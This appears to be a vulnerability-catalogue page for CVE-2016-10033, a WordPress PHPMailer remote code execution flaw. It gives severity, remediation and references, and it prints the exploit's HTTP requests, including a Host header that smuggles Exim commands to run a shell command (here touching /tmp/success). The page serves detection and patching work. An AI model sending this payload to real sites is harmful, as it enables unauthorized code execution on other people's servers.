🔙 목록으로 돌아가기

CVE-2016-10033: WordPress PHPMailer < 5.2.18 - Remote Code Execution

TitleWordPress PHPMailer < 5.2.18 - Remote Code Execution
Authorprincechaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website.
RemediationUpgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94457
CVE IDCVE-2016-10033
CWE IDCWE-88
Tags cve cve2016 seclists rce edb wordpress phpmailer_project kev vkev vuln

🔍 Vulnerability Description

WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a “ (backslash double quote) in a crafted Sender property in isMail transport.

🌐 HTTP Request

GET /?author=1 HTTP/1.1
Host: www.victim.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Accept: */*
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=G3U524

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10033.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10033.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A